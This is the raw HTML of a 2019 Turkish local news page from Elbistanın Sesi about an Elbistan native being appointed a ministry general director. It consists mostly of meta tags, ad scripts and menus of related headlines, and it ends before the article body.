
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Cumhurbaşkanı Recep Tayyip Erdoğan&#039;ın imzasıyla yayımlanan kararnameye göre Aile Çalışma ve Sosyal Hizmetler Bakanlığı Aile ve Toplum Hizmetleri"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı"> <meta property="og:description" content="Cumhurbaşkanı Recep Tayyip Erdoğan&#039;ın imzasıyla yayımlanan kararnameye göre Aile Çalışma ve Sosyal Hizmetler Bakanlığı Aile ve Toplum Hizmetleri"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı"> <meta name="twitter:description" content=" Cumhurbaşkanı Recep Tayyip Erdoğan’ın imzasıyla yayımlanan kararnameye göre, Aile, Çalışma ve Sosyal Hizmetler Bakanlığı Aile ve Toplum Hizmetleri Genel Müdürü Muhammet Örnek&#039;in yerine Elbistanlı Ali Çevik atandı."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" /> <meta itemprop="headline" content="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2019-08-23T18:27:29+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/araba-fiyatina-ulasan-kurbanliklar-alici-bekliyor-h63829.html" title="Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor" >Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/aziz-temur-anma-h55750.html" title="Aziz Temur Anma" >Aziz Temur Anma</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="f6d486b9d3e8a768454300acef8b6acc3bfa5184" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/durdu-govcecik-86-yasinda-h63960.html" title="Durdu Gövcecik 86 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/durdu_govcecik_86_yasinda_h63960_1677e.jpg" alt="Durdu Gövcecik 86 yaşında" /> Durdu Gövcecik 86 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/cuma-aydin-h63955.html" title="Cuma Aydın"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/cuma_aydin_h63955_66465.jpg" alt="Cuma Aydın" /> Cuma Aydın</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-elma-h63954.html" title="Hatice Elma"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/hatice_elma_h63954_7804d.jpg" alt="Hatice Elma" /> Hatice Elma</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fadime-dogan-h63941.html" title="Fadime Doğan"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/fadime_dogan_h63941_ff767.jpg" alt="Fadime Doğan" /> Fadime Doğan</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html" title="Elbistan’ın kuzey aksında asfalt çalışmaları başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/elbistanin_kuzey_aksinda_asfalt_calismalari_basladi_h63969_3a306.jpg" alt="Elbistan’ın kuzey aksında asfalt çalışmaları başladı" /> Elbistan’ın kuzey aksında asfalt çalışmaları başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html" title="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/cumhurbaskani_erdogan_elbistanli_ismi_genel_mudur_olarak_atadi_h63968_568e8.jpg" alt="Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı" /> Cumhurbaşkanı Erdoğan, Elbistanlı ismi genel müdür olarak atadı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/okullarin-acilis-ve-tatil-tarihleri-belli-oldu-h63967.html" title="Okulların açılış ve tatil tarihleri belli oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/okullarin_acilis_ve_tatil_tarihleri_belli_oldu_h63967_4f560.jpg" alt="Okulların açılış ve tatil tarihleri belli oldu" /> Okulların açılış ve tatil tarihleri belli oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-2-bin-4-lira-ceza-h63966.html" title="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/polis_cakari_kullanan_surucuye_2_bin_4_lira_ceza_h63966_72a16.jpg" alt="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza" /> Polis çakarı kullanan sürücüye 2 bin 4 lira ceza</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/muay-thai-bolge-sampiyonasinda-kiran-kirana-mucadele-h63449.html" title="Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/muay_thai_bolge_sampiyonasinda_kiran_kirana_mucadele_h63449_ce9de.JPG" alt="Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele" /> Muay Thai Bölge Şampiyonası’nda kıran kırana mücadele</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-muay-thai-bolge-sampiyonasina-ev-sahipligi-yapacak-h63425.html" title="Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistan_muay_thai_bolge_sampiyonasina_ev_sahipligi_yapacak_h63425_01a3d.jpg" alt="Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak" /> Elbistan, Muay Thai Bölge Şampiyonasına ev sahipliği yapacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/nergele-ve-gozpinar-futbol-takimlari-sinirda-dostluk-maci-yapacak-h62968.html" title="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/nergele_ve_gozpinar_futbol_takimlari_sinirda_dostluk_maci_yapacak_h62968_ee117.jpg" alt="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak" /> Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-balda-kaldi-h62748.html" title="Elbistanspor, BAL’da kaldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/elbistanspor_balda_kaldi_h62748_d2a0d.jpg" alt="Elbistanspor, BAL’da kaldı" /> Elbistanspor, BAL’da kaldı</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/vergi-dairesi-yapilandirma-icin-hafta-sonu-acik-olacak-h58716.html" title="Vergi dairesi, yapılandırma için hafta sonu açık olacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/07/vergi_dairesi_yapilandirma_icin_hafta_sonu_acik_olacak_h58716_87ab1.jpg" alt="Vergi dairesi, yapılandırma için hafta sonu açık olacak" /> Vergi dairesi, yapılandırma için hafta sonu açık olacak</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img 